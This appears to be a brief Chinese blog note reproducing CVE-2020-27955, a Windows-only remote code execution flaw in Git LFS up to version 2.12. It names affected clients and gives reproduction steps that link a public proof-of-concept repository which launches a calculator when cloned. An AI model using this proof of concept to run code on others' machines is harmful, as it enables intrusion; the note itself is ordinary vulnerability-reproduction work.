今天遇到了一个比较有意思的洞,复现一下下..........
漏洞描述
Git LFS 是 Github 开发的一个 Git 的扩展,用于实现 Git 对大文件的支持
一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree等
该漏洞影响仅windows平台
漏洞影响
Git-LFS(git-lfs)<= 2.12
漏洞复现
克隆下面的仓库,如果版本在影响范围则会弹出计算器
clone https://github.com/r00t4dm/CVE-2020-27955
我们需下载git 与git-lfs
Git - Downloading Package
https://github.com/git-lfs/git-lfs/releases/tag/v2.12.0
安装之后执行
git-lfs.exe clone https://github.com/r00t4dm/CVE-2020-27955